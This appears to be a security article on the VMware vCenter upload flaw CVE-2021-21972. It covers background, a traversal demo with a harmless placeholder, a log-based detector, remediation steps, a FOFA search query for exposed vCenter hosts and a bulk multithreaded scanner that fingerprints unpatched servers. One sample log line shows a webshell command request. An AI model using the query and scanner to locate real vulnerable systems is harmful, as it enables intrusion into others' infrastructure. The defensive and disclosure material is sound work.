About the VMware vcenter unauthorized arbitrary file upload vulnerability (CVE-2021-21972)

Background

CVE-2021-21972 is an unauthenticated remote code execution vulnerability in VMware vCenter Server. The vRealize Operations (vROps) plugin shipped with the vSphere Client exposes an upload endpoint under /ui/vropspluginui/ that can be reached without logging in, and the archive it receives is unpacked without sanitising the entry paths. An attacker can therefore write a file such as a JSP webshell to an arbitrary location on the vCenter server and then request it to execute commands.
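The paragraph above says a file can be written "to any location"; the reason is the archive extraction, not the upload itself. The following added example (not code from the original article or from VMware) shows the bug class in isolation: it builds, in memory, a tar archive whose single entry is named with "../" components, runs it through a naive extractor that joins the entry name straight onto the destination directory, and then through a hardened extractor that resolves each target path and refuses anything that leaves the destination. Everything in it is constructed: the entry name, the placeholder payload, and the temporary directories; nothing here talks to a vCenter.

```python
import io
import os
import tarfile
import tempfile

# Constructed entry name: escapes two levels above the extraction directory.
TRAVERSAL_ENTRY = "../../outside/shell.jsp"
PLACEHOLDER = b"<%-- placeholder, not a webshell --%>"


def build_traversal_tar(entry_name=TRAVERSAL_ENTRY, payload=PLACEHOLDER):
    """Build a tar archive in memory with one entry whose name escapes the
    extraction directory. This is the shape of archive a path-traversal
    upload relies on; the content is a harmless placeholder."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo(name=entry_name)
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def extract_unsafe(tar_bytes, dest):
    """Naive extractor: joins each entry name onto dest without validation,
    so '..' in the name lands the file outside dest. Returns the real paths
    actually written."""
    written = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        for member in tar.getmembers():
            target = os.path.join(dest, member.name)
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(tar.extractfile(member).read())
            written.append(os.path.realpath(target))
    return written


def extract_safe(tar_bytes, dest):
    """Hardened extractor: accepts only regular files and only targets whose
    resolved path stays under dest; raises ValueError otherwise."""
    root = os.path.realpath(dest)
    written = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                raise ValueError("refusing non-regular entry: %s" % member.name)
            target = os.path.realpath(os.path.join(root, member.name))
            if os.path.commonpath([root, target]) != root:
                raise ValueError("path traversal in entry: %s" % member.name)
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(tar.extractfile(member).read())
            written.append(target)
    return written


def demo():
    """Run both extractors on the same archive inside a throwaway directory.
    Returns (escaped, blocked): whether the naive extractor wrote outside the
    upload directory, and whether the hardened one refused the entry."""
    tar_bytes = build_traversal_tar()
    with tempfile.TemporaryDirectory() as tmp:
        upload_dir = os.path.join(tmp, "a", "b", "upload_dir")
        os.makedirs(upload_dir)
        unsafe_paths = extract_unsafe(tar_bytes, upload_dir)
        inside = os.path.realpath(upload_dir) + os.sep
        escaped = not unsafe_paths[0].startswith(inside)
        try:
            extract_safe(tar_bytes, upload_dir)
            blocked = False
        except ValueError:
            blocked = True
    return escaped, blocked


if __name__ == "__main__":
    print(demo())
```

The check in extract_safe is the same one Python 3.12's tarfile applies when you call extractall(filter="data"); on older interpreters, or in any other language's tar library, it has to be written by hand as above. Symlink and hard-link entries are rejected outright because a link pointing outside the directory followed by a later entry written through it is the other classic way out.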

Affected versions

vmware:vcenter_server:7.0/6.7/6.5 (builds earlier than the fixed releases listed under Remediation)

The ESXi hypervisor itself is not affected by this CVE: the vulnerable code is the vROps plugin inside the vSphere Client, which runs on the vCenter Server appliance.

Vulnerability reproduction: FOFA query

Syntax: title="+ ID_VC_Welcome +"

(The FOFA search returns hosts whose page title is the vCenter login page title.)

POC

https://xxxx/ui/vropspluginui/rest/services/uploadova

Send a plain GET request to this endpoint. An unpatched vCenter answers HTTP 405 (Method Not Allowed) because the upload handler is reachable without authentication but only accepts POST; a patched vCenter requires a session and answers 401 instead. The 405 response is the fingerprint used by the script below.

The script from https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC can be used for batch verification (reproduced below with its bugs fixed: the proxy dictionary key was misspelled so the proxy was never applied, and the entry point line had been merged into a comment):

#-*- coding:utf-8 -*-
banner = """
    888888ba dP           
    88 `8b 88           
    a88aaaa8P' .d8888b. d8888P .d8888b. dP dP 
    88 `8b. 88' `88 88 Y8ooooo. 88 88 
    88 .88 88. .88 88 88 88. .88 
    88888888P `88888P8 dP `88888P' `88888P' 
  ooooooooooooooooooooooooooooooooooooooooooooooooooooo 
        @time:2021/02/24 CVE-2021-21972.py
        C0de by NebulabdSec - @batsu         
 """
print(banner)

import argparse
import http.client
import random
from concurrent.futures import ThreadPoolExecutor

import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Force HTTP/1.0 so requests sends a minimal request without keep-alive.
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'

TARGET_URI = "/ui/vropspluginui/rest/services/uploadova"
OUTPUT_FILE = "vulnerability address.txt"

# Optional proxy. requests keys the proxies dict by URL scheme ("http"/"https");
# the original "scoks5" key was a typo, so the proxy was silently ignored.
# PROXIES = {"http": "socks5h://127.0.0.1:1081", "https": "socks5h://127.0.0.1:1081"}
PROXIES = None


def get_ua():
    """Return a randomised Chrome-like User-Agent string."""
    first_num = random.randint(55, 62)
    third_num = random.randint(0, 3200)
    fourth_num = random.randint(0, 140)
    os_type = [
        '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',
        '(Macintosh; Intel Mac OS X 10_12_6)'
    ]
    chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)

    ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
                   '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'])
    return ua


def CVE_2021_21972(url):
    """Probe one vCenter base URL (scheme://host[:port]) for the unauthenticated
    uploadova endpoint and record it if the 405 fingerprint matches."""
    headers = {
        'User-Agent': get_ua(),
        "Content-Type": "application/x-www-form-urlencoded"
    }
    targetUrl = url.rstrip("/") + TARGET_URI
    try:
        res = requests.get(targetUrl,
                           headers=headers,
                           timeout=15,
                           verify=False,
                           proxies=PROXIES)
        # Unpatched: the handler is reachable without a session and only accepts
        # POST, so a GET is answered with 405. Patched: 401 (authentication required).
        if res.status_code == 405:
            print("[+] URL:{}--------CVE-2021-21972 vulnerability exists".format(url))
            with open(OUTPUT_FILE, 'a') as fw:
                fw.write(url + '\n')
        else:
            print("[-] {} No CVE-2021-21972 vulnerability was found (HTTP {}).\n".format(
                url, res.status_code))
    except requests.RequestException as e:
        print("[-] {} Request ERROR: {}\n".format(url, e))


def multithreading(filename, pools=5):
    """Read one URL per line from filename and probe them with a thread pool."""
    with open(filename, "r") as f:
        urls = [line.strip() for line in f if line.strip()]
    with ThreadPoolExecutor(max_workers=pools) as pool:
        # list() forces the map to complete before the pool is shut down
        list(pool.map(CVE_2021_21972, urls))


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("-u",
                        "--url",
                        help="Target URL; Example:http://ip:port")
    parser.add_argument("-f",
                        "--file",
                        help="Url File; Example:url.txt")
    args = parser.parse_args()
    url = args.url
    file_path = args.file
    if url is not None and file_path is None:
        CVE_2021_21972(url)
    elif url is None and file_path is not None:
        multithreading(file_path, 10)  # 10 worker threads
    else:
        parser.print_help()


if __name__ == "__main__":
    main()
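The scanner above leaves a very recognisable trail: a GET to the uploadova path that draws a 405, then (if exploitation follows) a POST to the same path and a request to a freshly written JSP. The following added example (not part of the original article) runs that detection logic over a few constructed Tomcat-style access log lines of the kind the vsphere-ui service writes; the sample lines, the IP addresses and the JSP path in them are all made up for the example, and the exact log file location on a given vCenter build is not assumed here.

```python
import re

UPLOADOVA = "/ui/vropspluginui/rest/services/uploadova"

# Tomcat / Apache "combined" access log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Constructed sample log: one benign login, one scanner probe (GET -> 405),
# one upload (POST -> 200), one request to a JSP, one unrelated 401.
SAMPLE_LOG = """\
10.0.0.7 - - [24/Feb/2021:10:15:32 +0000] "GET /ui/login HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.1234.56 Safari/537.36"
198.51.100.23 - - [24/Feb/2021:10:16:01 +0000] "GET /ui/vropspluginui/rest/services/uploadova HTTP/1.0" 405 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.2211.101 Safari/537.36"
198.51.100.23 - - [24/Feb/2021:10:16:04 +0000] "POST /ui/vropspluginui/rest/services/uploadova HTTP/1.0" 200 11 "-" "python-requests/2.25.1"
198.51.100.23 - - [24/Feb/2021:10:16:09 +0000] "GET /ui/resources/shell.jsp?cmd=id HTTP/1.1" 200 96 "-" "python-requests/2.25.1"
10.0.0.7 - - [24/Feb/2021:10:17:40 +0000] "GET /ui/vropspluginui/rest/services/getstatus HTTP/1.1" 401 0 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one access log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(lines):
    """Return a list of (severity, ip, reason) findings.

    medium:   GET to uploadova answered 405 (the scanner fingerprint; the
              endpoint is reachable without authentication)
    high:     POST to uploadova accepted with 200 (an archive was uploaded)
    critical: the same client then requests a .jsp path (likely webshell use)
    """
    findings = []
    uploaders = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, method, status = rec["ip"], rec["method"], rec["status"]
        path = rec["path"].split("?", 1)[0]
        if path == UPLOADOVA:
            if method == "GET" and status == "405":
                findings.append((
                    "medium", ip,
                    "uploadova probe: GET answered 405, endpoint reachable without auth"))
            elif method == "POST":
                sev = "high" if status == "200" else "medium"
                findings.append((sev, ip, "uploadova POST, HTTP %s" % status))
                if status == "200":
                    uploaders.add(ip)
        elif ip in uploaders and path.lower().endswith(".jsp"):
            findings.append((
                "critical", ip,
                "request to %s after an accepted uploadova POST" % path))
    return findings


def run_sample():
    """Run the detector over the constructed sample log."""
    return detect(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for severity, ip, reason in run_sample():
        print("[%s] %s: %s" % (severity.upper(), ip, reason))
```

Any request at all to the uploadova path is worth alerting on, because the legitimate vROps plugin workflow that uses it is rare and is performed by an authenticated administrator, never by an anonymous client with a python-requests or randomised browser User-Agent. A patched vCenter answers 401 to the probe; if you still see 405 in your own logs after applying the update, the fix did not take.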

Remediation

Upgrade vCenter Server 7.0 to 7.0 U1c
Upgrade vCenter Server 6.7 to 6.7 U3l
Upgrade vCenter Server 6.5 to 6.5 U3n

After upgrading, repeat the GET request from the POC section: the endpoint should now answer 401 rather than 405. Where the upgrade cannot be applied immediately, the vCenter management interface should not be reachable from untrusted networks.
